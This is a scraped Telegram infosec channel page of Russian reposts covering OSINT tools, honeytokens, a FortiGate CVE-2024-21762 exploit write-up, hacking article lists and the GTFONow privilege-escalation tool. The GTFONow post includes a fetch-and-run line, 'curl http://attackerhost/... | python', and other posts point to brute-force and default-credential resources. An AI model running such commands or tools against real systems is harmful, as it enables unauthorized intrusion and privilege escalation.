Fsecurity | HH
Kanalga Telegram’da o‘tish
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Ko'proq ko'rsatish2 010
Obunachilar
+224 soatlar
-17 kunlar
-1030 kunlar
Postlar arxiv
2 010
Repost from Rick Academy — Хакинг и Кибербезопасность
🪞 Alfred — инструмент сбора информации OSINT
Продвинутый инструмент для сбора информации, который находит учетные записи в соц. сетях. С помощью инструмента можно быстро сканировать сайты на наличие определённого имени пользователя. Утилита написана на Python и имеет простой интерфейс.
🪞 Вот вам ссылка на Github
Rick Academy 🕵#osint
2 010
Repost from Пакет Безопасности
Попался
Пока все массово обсуждают и пытаются понять, как это за пару месяцев в 2024 году утекло уже более 510 000 000 данных граждан нашей страны (что уже побило рекорд за весь прошлый год), предлагаю обсудить один достаточно интересный тип инструментов, который из профессиональной сферы начинает перетекать в бытовую, а имя ему – Honey Tokens. Да, это пост не только для кибербезопасников, а для всех, кто интересуется кибергигиеной.
Мы с вами уже как-то разбирались в том, что такое HoneyPot, так вот, это его родственник. Если коротко, то эта штука позволяет обнаружить признаки и факт взлома любого вашего устройства или сервиса. Происходит это благодаря специальным меткам, маркерам или триггерам, которые умеют расставлять инструменты класса Honey Tokens. Более того, в некоторых случаях, можно даже вычислить источник взлома.
Как же это работает. На самом деле, всё очень просто. Вы выбираете нужную приманку – например, текстовый файл с названием "Пароли" или папку с названием "Документы" (только не надо класть туда реальные пароли или сканы настоящих документов), а затем буквально устанавливаете на них сигнализацию. То есть, как только кто-то попробуем открыть этот файл или зайти в конкретную папку, вам отправится уведомление о том, что это произошло.
Ну а теперь переходим от теории к практике – вы сами можете попробовать, как это работает, например, с Сanary Tokens. Через него вы сможете настроить ту самую сигнализацию на любой файл, ссылку, айпишник, электронную почту, папку и еще много чего. Уведомления именно в этом сервисе можно настроить на вашу почту. И да, всё это бесплатно и с понятным интерфейсом. Так что пользуйтесь на здоровье и делитесь с близкими.
#Полезное
Твой Пакет Безопасности
2 010
☝️ Демо работающего эксплойта к предыдущему исследованию
2 010
#research #CVE
🔎 Команда исследователей Assetnote представила очередной подробный ресёрч. На этот раз это pre-auth RCE в FortiGate SSLVPN (CVE-2024-21762).
🧰 Под катом вас ждет подробное описание каждого шага: от извлечения бинарей до создания работающего эксплойта👇
2 010
Repost from Life-Hack - Хакер
Топ популярных постов за прошедшую неделю (сохрани себе и отправь другу):
1. Предыдущий топ статей
2. Структура файловой системы Linux: /bin, /etc, /home и другие.
3. Default Credentials Cheat Sheet
4. Шесть лучших инструментов для работы с прокси
5. Начало Aircrack-ng и WEF
6. Грубая сила. Брутим RDP, SSH, VNC, Instagram и стандартные формы веб-аутентификации
7. Первая неделя курса "Linux для новичков" - основы операционной системы Linux.
8. Курс «Kubernetes»
9. Два инструмента пост-эксплуатации для Windows и Linux.
10. Пять инструментов для анализа и поиска данных
#подборка
LH | Новости | Курсы | Мемы
2 010
Проходя одну машину на HackTheBox, в поисках нашел эту статью:
🔗 Ссылка:
https://habr.com/ru/companies/rvision/articles/686784/
Советую почитать 👾
2 010
Хочу также посоветовать:
1 - Проверить себя на утечки! 💧
2 - Наш discord сервер! Где можно пообщаться 👾
3 - Мой Github 🦑
Наш второй канал [Ximera-Chan]
2 010
Repost from Cybred
RustRedOps
Репозиторий со сниппетами кода, которые могут быть полезны при написании Red Team инструментов. Знакомые техники бинарной эксплуатации, переписанные на Rust.
2 010
Repost from Не хакинг, а ИБ
🐱 Набор ресурсов по информационной безопасности
Цель этого проекта – выступить в качестве бесплатного ресурса для всех, кто заинтересован в получении дополнительной информации об информационной безопасности.
В репозитории вы найдете:
1. Анонимность
2. Основная информация о безопасности
3. Построение лаборатории для пентеста
4. Взлом автомобиля
5. OSINT
6. Фишинг
7. Социальная инженерия
8. Моделирование угроз и многое другое
«Как американцы с таким трудом усвоили в последнем столетии существования Земли, свободный поток информации является единственной гарантией от тирании. Некогда закованные в цепи люди, чьи лидеры, наконец, теряют контроль над информационным потоком, вскоре обретут свободу и жизненную силу, но свободная нация, постепенно сужающая свою власть над общественным дискурсом, начала свое стремительное сползание к деспотизму. Остерегайтесь того, кто откажет вам в доступе к информации, ибо в глубине души он мечтает стать вашим хозяином» - Комиссар Правин Лал🗄 Репозиторий – линк. // Не хакинг, а ИБ
2 010
Repost from Kali Linux
💻 В этом посте поговорим об инструменте `GTFONow`
Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду
sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.
Основные особенности:
🗄Автоматическая эксплуатация неправильно настроенных разрешений sudo.
🗄Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
🗄Автоматическая эксплуатация неправильных настроенных компонентов ОС.
🗄Автоматическая эксплуатация через SSH‑ключи.
🗄Автоматическая эксплуатация через файл используемый в cron.
🗄Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
🗄Легкий запуск без файлов с помощью curl http://attackerhost/gtfonow.py | python
🖥 GTFONow
@linuxkalii2 010
Repost from Этичный Хакер
😈 OSINT: сборник докладов
В этом посте собрали для вас подборку докладов с разных форумов, митапов и конференций. В приведённом ниже списке мы рассмотрим основные методы и инструменты OSINT, которые могут помочь вам получить нужную информацию для различных целей - от исследования рынка до проверки подлинности фотографий и расследования преступлений.
— Мы также обсудим, как правильно проводить поиск в интернете, как анализировать информацию и как сохранять ее для дальнейшего использования, а также узнаете, как определить надежность источника информации, а также как избегать ложной информации.
1. OSINT: Введение в специальность
2. Общедоступная и неочевидная практика OSINT, методы и кейсы
3. OSINT в расследовании киберинцидентов
4. Shadow OSINT: information leaks usage
5. Боевой OSINT: когда открытых источников не хватает.
#OSINT #Recon | 🧑💻 Этичный хакер
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
